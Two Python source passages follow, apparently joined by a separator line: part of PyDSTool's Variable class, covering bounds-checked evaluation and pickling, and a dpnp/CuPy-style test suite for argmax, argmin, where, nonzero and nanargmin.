self.coordname == self.output.coordnames[0]
), "Mismatch between Pointset coord name and declared name"
assert self.indepvarname == self.output.indepvarname, (
"Mismatch between Pointset independent variable name "
"and declared name"
)
def __call__(self, indepvar, checklevel=0):
# Set actual time by subtracting internal offset. Especially for use by
# "input" variables that are based on inherently time-shifted
# arrays of values, with nothing to do with the globalt0 of hybrid
# trajectories.
indepvar = asarray(indepvar) - self._internal_t_offset
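        # Editor's summary (not in the original source) of checklevel:
        #   0: no bounds checking at all
        #   1: uncertain boundary cases silently treated as contained
        #   2: as level 1, but uncertain cases are logged in self.diagnostics
        #   3: uncertain or out-of-range values raise an exception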
if checklevel == 0:
# level 0 -- no depvar bounds checking at all
# (no need to check for indepvar as list case, which output
# should know how to handle)
try:
if not self._vectorizable and isinstance(indepvar, _seq_types):
return [self.output(ival) for ival in indepvar]
else:
return self.output(indepvar)
except (OverflowError, ValueError):
self.diagnostics.errors.append(
(indepvar, self.name + ": Overflow error in output")
)
raise
except PyDSTool_BoundsError:
self.diagnostics.errors.append(
(indepvar, self.name + ": Bounds error in output")
)
raise
elif checklevel in [1, 2]:
if self.trajirange is None:
idep = self.indepdomain
else:
# use known bounds on indep variable imposed by self.output
idep = self.trajirange
indepvar_ok = True
# level 1 -- ignore uncertain cases (treat as contained)
# level 2 -- warn on uncertain (treat as contained)
if isinstance(indepvar, _seq_types):
vectorizable = self._vectorizable
for d in indepvar:
# use 'in' so that this is compatible with
# interval, array and index indeps
try:
contresult = d in idep
except PyDSTool_UncertainValueError:
contresult = True
# adjust for rounding error so that interpolator
# does not barf on out-of-range values
if d < idep[0]:
try:
# list
dix = indepvar.index(d)
except AttributeError:
# array
dix = indepvar.tolist().index(d)
indepvar[dix] = idep[0]
elif d > idep[1]:
try:
# list
dix = indepvar.index(d)
except AttributeError:
# array
dix = indepvar.tolist().index(d)
indepvar[dix] = idep[1]
if checklevel == 2:
self.diagnostics.warnings.append((d, None))
if not contresult:
indepvar_ok = False
break
else:
vectorizable = True
try:
indepvar_ok = indepvar in idep
except PyDSTool_UncertainValueError as errinfo:
# adjust for rounding error so that interpolator
# does not barf on out-of-range values
if indepvar < idep[0]:
indepvar = idep[0]
elif indepvar > idep[1]:
indepvar = idep[1]
if checklevel == 2:
self.diagnostics.warnings.append((indepvar, None))
# continue to get dependent variable value, unless indep
# value was not OK
if not indepvar_ok:
## print "*** Debug info for variable: ", self.name
## print "Interval rounding tolerance was", idep._abseps
if checklevel == 2:
self.diagnostics.errors.append(
(indepvar, self.name + " : " + self.indepdomain._infostr(1))
)
if vectorizable:
raise ValueError(
"Independent variable value(s) " "out of range in Variable call"
)
else:
raise ValueError(
"Independent variable value " + str(indepvar) + " out of "
"range in Variable call"
)
try:
if vectorizable:
depvar = self.output(indepvar)
else:
depvar = [self.output(ival) for ival in indepvar]
depvar_ok = True
except PyDSTool_BoundsError as errinfo:
depvar_ok = False
# Now check that all computed values were in depdomain
if depvar_ok:
# no need to use self.trajdrange instead of
# self.depdomain because we trust that self.output
# generated the output within its own bounds!
if isinstance(depvar, (_seq_types, Pointset)):
if isinstance(depvar, Pointset):
dv = depvar.toarray()
else:
dv = depvar
for d in dv:
# use 'in' so that this is compatible with
# interval, array and index indeps
try:
contresult = d in self.depdomain
except PyDSTool_UncertainValueError as errinfo:
contresult = True
if checklevel == 2:
# find which indepvar was the cause of
# the uncertain value
try:
# list
depix = dv.index(d)
except AttributeError:
# array
depix = dv.tolist().index(d)
self.diagnostics.warnings.append(
(indepvar[depix], errinfo.value)
)
if not isfinite(d):
# DEBUG
# print dv
# print self.output, "\n"
raise PyDSTool_BoundsError(
"Return value was not finite/defined (%s)" % str(d)
)
if not contresult:
depvar_ok = False
break
elif depvar is None:
# DEBUG
# print "*** Debug info for variable: ", self.name
# print "Independent variable domain: ", self.indepdomain._infostr(1)
# print "Dependent variable domain: ", self.depdomain._infostr(1)
raise ValueError(
"Cannot compute a return value for "
"independent variable value " + str(indepvar)
)
else:
if isinstance(depvar, Point):
dv = depvar[0]
else:
dv = depvar
try:
depvar_ok = dv in self.depdomain
except PyDSTool_UncertainValueError as errinfo:
if checklevel == 2:
self.diagnostics.warnings.append((indepvar, errinfo.varval))
if not isfinite(dv):
# DEBUG
# print dv
# print self.output, "\n"
raise PyDSTool_BoundsError(
"Return value was not finite/defined (%s)" % str(dv)
)
# return value if depvar in bounds
if depvar_ok:
return dv
else:
# DEBUG
# print "Variable '%s' -"%self.name, "dependent var domain: ", \
# self.depdomain._infostr(1)
# self.diagnostics.showWarnings()
                if vectorizable:
                    # DEBUG
                    # print self.output(indepvar), "\n"
                    # use %s: dv may be an array here, for which %f would fail
                    raise PyDSTool_BoundsError(
                        "Computed value(s) %s outside" % str(dv)
                        + " validity range in Variable call"
                    )
                else:
                    raise PyDSTool_BoundsError(
                        "Computed value %s outside" % str(dv)
                        + " validity range in Variable call"
                    )
else:
# level 3 -- exception will be raised for uncertain case
indepvar_ok = False
try:
# don't trap uncertain case exception from
# Interval.__contains__
if isinstance(indepvar, _seq_types):
vectorizable = self._vectorizable
indepvar_ok = all([i in self.indepdomain for i in indepvar])
else:
vectorizable = True
indepvar_ok = indepvar in self.indepdomain
except TypeError as e:
raise TypeError(
"Something messed up with the Variable " "initialization: " + str(e)
)
else:
if not indepvar_ok:
raise ValueError(
"Independent variable "
+ str(indepvar)
+ " out of range in Variable call"
)
# Don't need 'if indepvar_ok' because exception would have
# been raised.
# For this checklevel, don't trap uncertain case exception from
# Interval.__contains__
try:
if vectorizable:
depvar = self.output(indepvar)
depvar_ok = depvar in self.depdomain
else:
depvar = [self.output(ival) for ival in indepvar]
depvar_ok = all([d in self.depdomain for d in depvar])
except PyDSTool_BoundsError as e:
raise ValueError(
"Cannot compute a return value for "
"this independent variable value: " + str(e)
)
except PyDSTool_TypeError:
if not self.defined:
print("Variable '%s' not fully defined." % self.name)
return None
else:
raise
else:
if depvar_ok:
return depvar
else:
if vectorizable:
raise PyDSTool_BoundsError(
"Computed value(s) "
"outside validity range in Variable call"
)
else:
raise PyDSTool_BoundsError(
"Computed value "
+ str(depvar)
+ "outside validity range in Variable call"
)
def __repr__(self):
return self._infostr(verbose=0)
__str__ = __repr__
def _infostr(self, verbose=1):
if verbose == 0:
return "Variable " + self.coordname + "(" + self.indepvarname + ")"
else:
try:
if isinputcts(self):
ipstr = "continuous"
else:
ipstr = "discrete"
except ValueError:
ipstr = "not defined"
outputStr = (
"Variable:\n Independent variable '"
+ self.indepvarname
+ "' ["
+ ipstr
+ "]\n"
)
try:
if isoutputcts(self):
opstr = "continuous"
else:
opstr = "discrete"
except ValueError:
opstr = "not defined"
outputStr += " defined in domain " + str(self.indepdomain)
if verbose == 2:
if self.trajirange is None:
outputStr += "\n ranges not known for this trajectory"
else:
outputStr += "\n trajectory ranges " + str(self.trajirange)
outputStr += (
"\nDependent variable '"
+ self.coordname
+ "' ["
+ opstr
+ "]\n defined in domain "
)
if not isinstance(self.depdomain, Interval):
outputStr += _num_type2name[self.coordtype] + ": "
outputStr += str(self.depdomain)
if verbose == 2:
if self.trajdrange is None:
outputStr += "\n ranges not known for this trajectory"
else:
outputStr += "\n trajectory ranges " + str(self.trajdrange)
return outputStr
def info(self, verboselevel=1):
print(self._infostr(verboselevel))
def __copy__(self):
pickledself = pickle.dumps(self)
return pickle.loads(pickledself)
def __deepcopy__(self, memo=None, _nil=[]):
pickledself = pickle.dumps(self)
return pickle.loads(pickledself)
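    # Note (added comment, not in the original source): copying via a pickle
    # round-trip, as above, sidesteps the dynamically attached methods that
    # plain copy.deepcopy() may not handle; __getstate__/__setstate__ below
    # strip and restore those pieces.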
def __getstate__(self):
d = copy.copy(self.__dict__)
# remove reference to Cfunc types by converting to strings
d["indepvartype"] = _num_type2name[self.indepvartype]
d["coordtype"] = _num_type2name[self.coordtype]
if "funcspec" in self._funcreg:
# then self is Imp/ExplicitFnGen and 'output' could not
# be put in _funcreg because it relies on wrap_output
# function that's not in the global namespace (so pickle fails
# to find it)
del d["output"]
for fname, finfo in self._funcreg.items():
if finfo[0] == "self":
try:
del d[fname]
except KeyError:
pass
# else it's a Variable class method which won't get pickled
# anyway, and will be restored to any class not in possession
# of it if this object is unpickled
return d
def __setstate__(self, state):
self.__dict__.update(state)
# print self.name, "- setstate: self.depdomain = ", self.depdomain.get()
# reinstate Cfunc types
self.indepvartype = _num_name2type[self.indepvartype]
self.coordtype = _num_name2type[self.coordtype]
# reinstate dynamic methods / functions
for fname, finfo in self._funcreg.items():
if finfo[0] == "self" and not hasattr(eval(finfo[0]), fname):
# avoids special entry for 'outputdata'
setattr(eval(finfo[0]), fname, finfo[1])
if "funcspec" in self._funcreg:
# Add the specific mapping functions for Ex/ImplicitFnGen objects
funcspec = self._funcreg["funcspec"][1]
outputdata = self._funcreg["outputdata"][1]
if hasattr(self, "_var_namemap"):
var_namemap = self._var_namemap
else:
var_namemap = None
if hasattr(self, "initialconditions"):
ics = copy.copy(self.initialconditions)
else:
ics = None
if hasattr(self, "_refvars"):
if self._refvars is not None and self._refvars != []:
refvars = [copy.copy(v) for v in self._refvars]
else:
refvars = None
else:
refvars = None
# if refvars in dictionary then just leave them there!
self.setOutput(
outputdata, funcspec, self.globalt0, var_namemap, ics, refvars
)
def __del__(self):
# delete object-specific class methods etc. before deleting
# to avoid crowding namespace
## if hasattr(self, 'output'):
## del self.output
for fname, finfo in self._funcreg.items():
# Treat special cases first
if finfo[0] is None:
# don't want to eval(None) below
continue
elif fname == "_impfn":
exec_str = "del Variable." + finfo[0]
try:
exec(exec_str)
except AttributeError:
                    # Uncertain why the name appears multiple times, causing
                    # multiple deletion attempts (which of course fail after
                    # the first successful one)
pass
elif fname is "funcspec":
# doesn't refer to any dynamically-created methods
# so ignore
pass
elif fname is "outputdata":
# doesn't refer to any dynamically-created methods
# so ignore
pass
elif hasattr(eval(finfo[0]), fname):
exec_str = "del " + finfo[0] + "." + fname
try:
exec(exec_str)
except RuntimeError:
                    # sometimes get these when objects are improperly deleted
                    # and new objects with the same name are created
pass
if hasattr(self, "_refvars"):
if self._refvars is not None and self._refvars != []:
for v in self._refvars:
v.__del__()
class HybridVariable(Variable):
"""Mimics part of the API of a non-hybrid variable.
This is a somewhat ugly hack as it's implemented by using a whole
HybridTrajectory object to extract individual variable values,
rather than having extracted a sequence of Variable objects from
a HT and stitching them back together as a single entity."""
def __init__(self, hybridtraj, coordname, indepdomain, abseps=None):
# store reference to the hybrid trajectory
self._ht = hybridtraj
self.name = "Hybrid variable " + coordname
self.outputdata = None # not used
self.defined = True
self.indepvarname = "t"
self.indepdomain = indepdomain
self.indepvartype = float
self.coordname = coordname
self.depdomain = Interval(self.coordname, float, [-Inf, Inf], abseps=abseps)
self.coordtype = float
self.trajirange = None
self.trajdrange = None
self.diagnostics = Diagnostics()
# important that this isn't a Pointset for Variable.py's
# isinputcts, isoutputcts, etc.
self.output = None
def __call__(self, indepvar, checklevel=0):
return self._ht(indepvar, self.coordname, checklevel=checklevel)
def getDataPoints(self):
"""Returns a Pointset of independent and dependent variable values,
provided variable is based on a mesh (otherwise None is returned).
"""
return self._ht.sample([self.coordname])
def underlyingMesh(self):
"""Reveal underlying mesh as arrays, rather than Pointset as returned
by getDataPoints method."""
vs = self._ht.sample([self.coordname])
return array([vs.indepvararray, vs.coordarray[0]])
def __repr__(self):
return "Hybrid variable " + self.coordname
__str__ = __repr__
def info(self, verboselevel=1):
return "Hybrid variable " + self.coordname
# overrides from Variable class
def __getstate__(self):
return copy.copy(self.__dict__)
def __setstate__(self, state):
self.__dict__.update(state)
def __del__(self):
# must override Variable.__del__
pass
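# Usage sketch (added, hedged; `htraj` stands for a hypothetical
# HybridTrajectory instance, not a name from this module):
#
#     v = HybridVariable(htraj, 'x', Interval('t', float, [0, 10]))
#     v(2.5)               # delegates to htraj(2.5, 'x', checklevel=0)
#     v.getDataPoints()    # Pointset sampled from the underlying trajectory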
class OutputFn(object):
"""One-dimensional function wrapper."""
def __init__(self, fn, datapoints=None, numtypes=(float64, float64), abseps=None):
assert isinstance(fn, types.FunctionType) or isinstance(
fn, types.BuiltinFunctionType
), "fn argument must be a regular Python function"
self.fn = fn
# datapoints can be exhaustive list of known values for fn or
# a Interval range for continuous-valued functions
if datapoints is None:
datapoints = (
Interval("indepvardom", numtypes[0], [-Inf, Inf], abseps=abseps),
Interval("depvardom", numtypes[1], [-Inf, Inf], abseps=abseps),
)
try:
self.datapoints = (datapoints[0], datapoints[1])
except TypeError:
raise TypeError(
"datapoints argument must be a 2-tuple or list " "of 2-tuples or lists"
)
try:
self.types = (numtypes[0], numtypes[1])
except TypeError:
raise TypeError(
"numtypes argument must be a 2-tuple or list " "of 2-tuples or lists"
)
def __call__(self, arg):
if isinstance(arg, _seq_types):
try:
return self.fn(arg)
            except Exception:
                # fn is not vectorized; fall back to element-wise evaluation
return array([self.fn(v) for v in arg])
else:
return self.fn(arg)
def __getstate__(self):
d = copy.copy(self.__dict__)
# remove reference to Cfunc types by converting to strings
d["types"] = (_num_type2name[self.types[0]], _num_type2name[self.types[1]])
return d
def __setstate__(self, state):
self.__dict__.update(state)
# reinstate Cfunc types
self.types = (_num_name2type[self.types[0]], _num_name2type[self.types[1]])
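# Usage sketch (added, hedged): OutputFn applies the wrapped function
# directly to scalars and falls back to element-wise evaluation on
# sequences, e.g. assuming `import math`:
#
#     f = OutputFn(math.sin)
#     f(0.0)                   # -> 0.0 (scalar path)
#     f([0.0, math.pi / 2])    # -> array([0., 1.]) (sequence fallback)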
# ---------------------------------------------------------------------
def isinputcts(obj):
if isinstance(obj, Variable):
if obj.defined:
if compareNumTypes(obj.indepvartype, float64):
return isinstance(obj.indepdomain, Interval) and not isinstance(
obj.output, Pointset
)
elif compareNumTypes(obj.indepvartype, int32):
return False
else:
raise TypeError("Unsupported independent variable type for Variable")
else:
raise ValueError("Variable is not fully defined")
else:
# provide support for e.g. Trajectories. Cannot use Trajectory class
# name explicitly here because will run into an infinite import loop
# between Variable and Trajectory!
if compareNumTypes(obj.indepvartype, float64):
return isinstance(obj.indepdomain, Interval)
def isinputdiscrete(var):
return not isinputcts(var)
##def isinputdiscrete(var):
## if compareNumTypes(var.indepvartype, float64):
## return type(var.indepdomain) == ndarray or \
## isinstance(var.output, Pointset)
## elif compareNumTypes(var.indepvartype, int32):
## return True
## else:
## raise TypeError("Unsupported independent variable type for Variable")
def isoutputcts(var):
assert isinstance(var, Variable), "Argument must be a Variable"
if var.defined:
if compareNumTypes(var.coordtype, float64):
return isinstance(var.depdomain, Interval) and not isinstance(
var.output, Pointset
)
elif compareNumTypes(var.coordtype, int32):
return False
else:
raise TypeError("Unsupported dependent variable type for Variable")
else:
raise ValueError("Variable is not fully defined")
def isoutputdiscrete(obj):
return not isoutputcts(obj)
def iscontinuous(var):
"""Determine if variable is continuously defined on its input and
output domains."""
assert isinstance(var, Variable), "Argument must be a Variable"
return isinputcts(var) and isoutputcts(var)
def isdiscrete(var):
"""Determine if variable is discretely defined on its input and
output domains."""
return not (isinputcts(var) and isoutputcts(var))
|
import unittest
import numpy
import pytest
import dpnp as cupy
from tests.third_party.cupy import testing
# from cupy.core import _accelerator
@testing.gpu
class TestSearch(unittest.TestCase):
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose()
def test_argmax_all(self, xp, dtype):
a = testing.shaped_random((2, 3), xp, dtype)
return a.argmax()
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose()
def test_external_argmax_all(self, xp, dtype):
a = testing.shaped_random((2, 3), xp, dtype)
return xp.argmax(a)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose(accept_error=ValueError)
def test_argmax_nan(self, xp, dtype):
a = xp.array([float('nan'), -1, 1], dtype)
return a.argmax()
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose()
def test_argmax_axis_large(self, xp, dtype):
a = testing.shaped_random((3, 1000), xp, dtype)
return a.argmax(axis=0)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose()
def test_external_argmax_axis_large(self, xp, dtype):
a = testing.shaped_random((3, 1000), xp, dtype)
return xp.argmax(a, axis=0)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose()
def test_argmax_axis0(self, xp, dtype):
a = testing.shaped_random((2, 3, 4), xp, dtype)
return a.argmax(axis=0)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose()
def test_argmax_axis1(self, xp, dtype):
a = testing.shaped_random((2, 3, 4), xp, dtype)
return a.argmax(axis=1)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose()
def test_argmax_axis2(self, xp, dtype):
a = testing.shaped_random((2, 3, 4), xp, dtype)
return a.argmax(axis=2)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose()
def test_argmax_tie(self, xp, dtype):
a = xp.array([0, 5, 2, 3, 4, 5], dtype)
return a.argmax()
@testing.for_all_dtypes(no_complex=True)
def test_argmax_zero_size(self, dtype):
for xp in (numpy, cupy):
a = testing.shaped_random((0, 1), xp, dtype)
with pytest.raises(ValueError):
a.argmax()
@testing.for_all_dtypes(no_complex=True)
def test_argmax_zero_size_axis0(self, dtype):
for xp in (numpy, cupy):
a = testing.shaped_random((0, 1), xp, dtype)
with pytest.raises(ValueError):
a.argmax(axis=0)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose()
def test_argmax_zero_size_axis1(self, xp, dtype):
a = testing.shaped_random((0, 1), xp, dtype)
return a.argmax(axis=1)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose()
def test_argmin_all(self, xp, dtype):
a = testing.shaped_random((2, 3), xp, dtype)
return a.argmin()
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose(accept_error=ValueError)
def test_argmin_nan(self, xp, dtype):
a = xp.array([float('nan'), -1, 1], dtype)
return a.argmin()
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose()
def test_external_argmin_all(self, xp, dtype):
a = testing.shaped_random((2, 3), xp, dtype)
return xp.argmin(a)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose()
def test_argmin_axis_large(self, xp, dtype):
a = testing.shaped_random((3, 1000), xp, dtype)
return a.argmin(axis=0)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose()
def test_external_argmin_axis_large(self, xp, dtype):
a = testing.shaped_random((3, 1000), xp, dtype)
return xp.argmin(a, axis=0)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose()
def test_argmin_axis0(self, xp, dtype):
a = testing.shaped_random((2, 3, 4), xp, dtype)
return a.argmin(axis=0)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose()
def test_argmin_axis1(self, xp, dtype):
a = testing.shaped_random((2, 3, 4), xp, dtype)
return a.argmin(axis=1)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose()
def test_argmin_axis2(self, xp, dtype):
a = testing.shaped_random((2, 3, 4), xp, dtype)
return a.argmin(axis=2)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose()
def test_argmin_tie(self, xp, dtype):
a = xp.array([0, 1, 2, 3, 0, 5], dtype)
return a.argmin()
@testing.for_all_dtypes(no_complex=True)
def test_argmin_zero_size(self, dtype):
for xp in (numpy, cupy):
a = testing.shaped_random((0, 1), xp, dtype)
with pytest.raises(ValueError):
                a.argmin()
@testing.for_all_dtypes(no_complex=True)
def test_argmin_zero_size_axis0(self, dtype):
for xp in (numpy, cupy):
a = testing.shaped_random((0, 1), xp, dtype)
with pytest.raises(ValueError):
a.argmin(axis=0)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose()
def test_argmin_zero_size_axis1(self, xp, dtype):
a = testing.shaped_random((0, 1), xp, dtype)
return a.argmin(axis=1)
# This class compares CUB results against NumPy's
# TODO(leofang): test axis after support is added
# @testing.parameterize(*testing.product({
# 'shape': [(10,), (10, 20), (10, 20, 30), (10, 20, 30, 40)],
# 'order': ('C', 'F'),
# }))
# @testing.gpu
# @unittest.skipUnless(cupy.cuda.cub.available, 'The CUB routine is not enabled')
# class TestCubReduction(unittest.TestCase):
# def setUp(self):
# self.old_accelerators = _accelerator.get_routine_accelerators()
# _accelerator.set_routine_accelerators(['cub'])
# def tearDown(self):
# _accelerator.set_routine_accelerators(self.old_accelerators)
# @testing.for_dtypes('bhilBHILefdFD')
# @testing.numpy_cupy_allclose(rtol=1E-5)
# def test_cub_argmin(self, xp, dtype):
# a = testing.shaped_random(self.shape, xp, dtype)
# if self.order == 'C':
# a = xp.ascontiguousarray(a)
# else:
# a = xp.asfortranarray(a)
# if xp is numpy:
# return a.argmin()
# # xp is cupy, first ensure we really use CUB
# ret = cupy.empty(()) # Cython checks return type, need to fool it
# func = 'cupy.core._routines_statistics.cub.device_reduce'
# with testing.AssertFunctionIsCalled(func, return_value=ret):
# a.argmin()
# # ...then perform the actual computation
# return a.argmin()
# @testing.for_dtypes('bhilBHILefdFD')
# @testing.numpy_cupy_allclose(rtol=1E-5)
# def test_cub_argmax(self, xp, dtype):
# a = testing.shaped_random(self.shape, xp, dtype)
# if self.order == 'C':
# a = xp.ascontiguousarray(a)
# else:
# a = xp.asfortranarray(a)
# if xp is numpy:
# return a.argmax()
# # xp is cupy, first ensure we really use CUB
# ret = cupy.empty(()) # Cython checks return type, need to fool it
# func = 'cupy.core._routines_statistics.cub.device_reduce'
# with testing.AssertFunctionIsCalled(func, return_value=ret):
# a.argmax()
# # ...then perform the actual computation
# return a.argmax()
@testing.gpu
@testing.parameterize(*testing.product({
'func': ['argmin', 'argmax'],
'is_module': [True, False],
'shape': [(3, 4), ()],
}))
class TestArgMinMaxDtype(unittest.TestCase):
@testing.for_dtypes(
dtypes=[numpy.int8, numpy.int16, numpy.int32, numpy.int64],
name='result_dtype')
@testing.for_all_dtypes(name='in_dtype')
def test_argminmax_dtype(self, in_dtype, result_dtype):
a = testing.shaped_random(self.shape, cupy, in_dtype)
if self.is_module:
func = getattr(cupy, self.func)
y = func(a, dtype=result_dtype)
else:
func = getattr(a, self.func)
y = func(dtype=result_dtype)
assert y.shape == ()
assert y.dtype == result_dtype
@testing.parameterize(
{'cond_shape': (2, 3, 4), 'x_shape': (2, 3, 4), 'y_shape': (2, 3, 4)},
{'cond_shape': (4,), 'x_shape': (2, 3, 4), 'y_shape': (2, 3, 4)},
{'cond_shape': (2, 3, 4), 'x_shape': (2, 3, 4), 'y_shape': (3, 4)},
{'cond_shape': (3, 4), 'x_shape': (2, 3, 4), 'y_shape': (4,)},
)
@testing.gpu
class TestWhereTwoArrays(unittest.TestCase):
@testing.for_all_dtypes_combination(
names=['cond_type', 'x_type', 'y_type'])
@testing.numpy_cupy_allclose()
def test_where_two_arrays(self, xp, cond_type, x_type, y_type):
m = testing.shaped_random(self.cond_shape, xp, xp.bool_)
        # Almost all values produced by `shaped_random` are nonzero, so we
        # multiply by the boolean mask `m` to obtain a sparse condition.
cond = testing.shaped_random(self.cond_shape, xp, cond_type) * m
x = testing.shaped_random(self.x_shape, xp, x_type, seed=0)
y = testing.shaped_random(self.y_shape, xp, y_type, seed=1)
return xp.where(cond, x, y)
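# Note (added, not in the original tests): where(cond, x, y) broadcasts all
# three arguments to a common shape, which is what the parameterized shape
# combinations above exercise, e.g. cond (3, 4) with x (2, 3, 4) and y (4,)
# yields a (2, 3, 4) result.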
@testing.parameterize(
{'cond_shape': (2, 3, 4)},
{'cond_shape': (4,)},
{'cond_shape': (2, 3, 4)},
{'cond_shape': (3, 4)},
)
@testing.gpu
class TestWhereCond(unittest.TestCase):
@testing.for_all_dtypes()
@testing.numpy_cupy_array_equal()
def test_where_cond(self, xp, dtype):
m = testing.shaped_random(self.cond_shape, xp, xp.bool_)
cond = testing.shaped_random(self.cond_shape, xp, dtype) * m
return xp.where(cond)
@testing.gpu
class TestWhereError(unittest.TestCase):
def test_one_argument(self):
for xp in (numpy, cupy):
cond = testing.shaped_random((3, 4), xp, dtype=xp.bool_)
x = testing.shaped_random((2, 3, 4), xp, xp.int32)
with pytest.raises(ValueError):
xp.where(cond, x)
@testing.parameterize(
{'array': numpy.empty((0,))},
{'array': numpy.empty((0, 2))},
{'array': numpy.empty((0, 2, 0))},
)
@testing.gpu
class TestNonzero(unittest.TestCase):
@testing.for_all_dtypes()
@testing.numpy_cupy_array_equal()
def test_nonzero(self, xp, dtype):
array = xp.array(self.array, dtype=dtype)
return xp.nonzero(array)
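# Note (added, not in the original tests): nonzero returns a tuple of index
# arrays, one per dimension, e.g.
#
#     numpy.nonzero(numpy.array([[1, 0], [0, 2]]))
#     # -> (array([0, 1]), array([0, 1]))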
@testing.parameterize(
{'array': numpy.array(0)},
{'array': numpy.array(1)},
)
@testing.gpu
@testing.with_requires('numpy>=1.17.0')
class TestNonzeroZeroDimension(unittest.TestCase):
@testing.for_all_dtypes()
def test_nonzero(self, dtype):
for xp in (numpy, cupy):
array = xp.array(self.array, dtype=dtype)
with pytest.raises(DeprecationWarning):
xp.nonzero(array)
@testing.parameterize(
{'array': numpy.array(0)},
{'array': numpy.array(1)},
{'array': numpy.empty((0,))},
{'array': numpy.empty((0, 2))},
{'array': numpy.empty((0, 2, 0))},
)
@testing.gpu
class TestFlatNonzero(unittest.TestCase):
@testing.for_all_dtypes()
@testing.numpy_cupy_array_equal()
def test_flatnonzero(self, xp, dtype):
array = xp.array(self.array, dtype=dtype)
return xp.flatnonzero(array)
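# Note (added, not in the original tests): flatnonzero(a) is equivalent to
# nonzero(numpy.ravel(a))[0], i.e. indices into the flattened array, e.g.
#
#     numpy.flatnonzero(numpy.array([[1, 0], [0, 2]]))
#     # -> array([0, 3])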
@testing.parameterize(
{'array': numpy.empty((0,))},
{'array': numpy.empty((0, 2))},
{'array': numpy.empty((0, 2, 0))},
)
@testing.gpu
class TestArgwhere(unittest.TestCase):
@testing.for_all_dtypes()
@testing.numpy_cupy_array_equal()
def test_argwhere(self, xp, dtype):
array = xp.array(self.array, dtype=dtype)
return xp.argwhere(array)
# DPNP_BUG
# dpnp/backend.pyx:86: in dpnp.backend.dpnp_array
# raise TypeError(f"Intel NumPy array(): Unsupported non-sequence obj={type(obj)}")
# E TypeError: Intel NumPy array(): Unsupported non-sequence obj=<class 'int'>
# @testing.parameterize(
# {'array': cupy.array(1)},
# )
# @testing.gpu
# class TestArgwhereZeroDimension(unittest.TestCase):
# def test_argwhere(self):
# with testing.assert_warns(DeprecationWarning):
# return cupy.nonzero(self.array)
@testing.gpu
class TestNanArgMin(unittest.TestCase):
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose()
def test_nanargmin_all(self, xp, dtype):
a = testing.shaped_random((2, 3), xp, dtype)
return xp.nanargmin(a)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose(accept_error=ValueError)
def test_nanargmin_nan(self, xp, dtype):
a = xp.array([float('nan'), -1, 1], dtype)
return xp.nanargmin(a)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose(accept_error=ValueError)
def test_nanargmin_nan2(self, xp, dtype):
a = xp.array([float('nan'), float('nan'), -1, 1], dtype)
return xp.nanargmin(a)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose(accept_error=ValueError)
def test_nanargmin_nan3(self, xp, dtype):
a = xp.array([float('nan'), float('nan'), -1, 1, 1.0, -2.0], dtype)
return xp.nanargmin(a)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose(accept_error=ValueError)
def test_nanargmin_nan4(self, xp, dtype):
a = xp.array([-1, 1, 1.0, -2.0, float('nan'), float('nan')],
dtype)
return xp.nanargmin(a)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose(accept_error=ValueError)
def test_nanargmin_nan5(self, xp, dtype):
a = xp.array([-1, 1, 1.0, -2.0, float('nan'), float('nan'), -1, 1],
dtype)
return xp.nanargmin(a)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose()
def test_nanargmin_axis_large(self, xp, dtype):
a = testing.shaped_random((3, 1000), xp, dtype)
return xp.nanargmin(a, axis=0)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose()
def test_nanargmin_axis0(self, xp, dtype):
a = testing.shaped_random((2, 3, 4), xp, dtype)
return xp.nanargmin(a, axis=0)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose()
def test_nanargmin_axis1(self, xp, dtype):
a = testing.shaped_random((2, 3, 4), xp, dtype)
return xp.nanargmin(a, axis=1)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose()
def test_nanargmin_axis2(self, xp, dtype):
a = testing.shaped_random((2, 3, 4), xp, dtype)
return xp.nanargmin(a, axis=2)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose()
def test_nanargmin_tie(self, xp, dtype):
a = xp.array([0, 5, 2, 3, 4, 5], dtype)
return xp.nanargmin(a)
@testing.for_all_dtypes(no_complex=True)
def test_nanargmin_zero_size(self, dtype):
for xp in (numpy, cupy):
a = testing.shaped_random((0, 1), xp, dtype)
with pytest.raises(ValueError):
xp.nanargmin(a)
@testing.for_all_dtypes(no_complex=True)
def test_nanargmin_zero_size_axis0(self, dtype):
for xp in (numpy, cupy):
a = testing.shaped_random((0, 1), xp, dtype)
with pytest.raises(ValueError):
                xp.nanargmin(a, axis=0)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose()
def test_nanargmin_zero_size_axis1(self, xp, dtype):
a = testing.shaped_random((0, 1), xp, dtype)
return xp.nanargmin(a, axis=1)
@testing.gpu
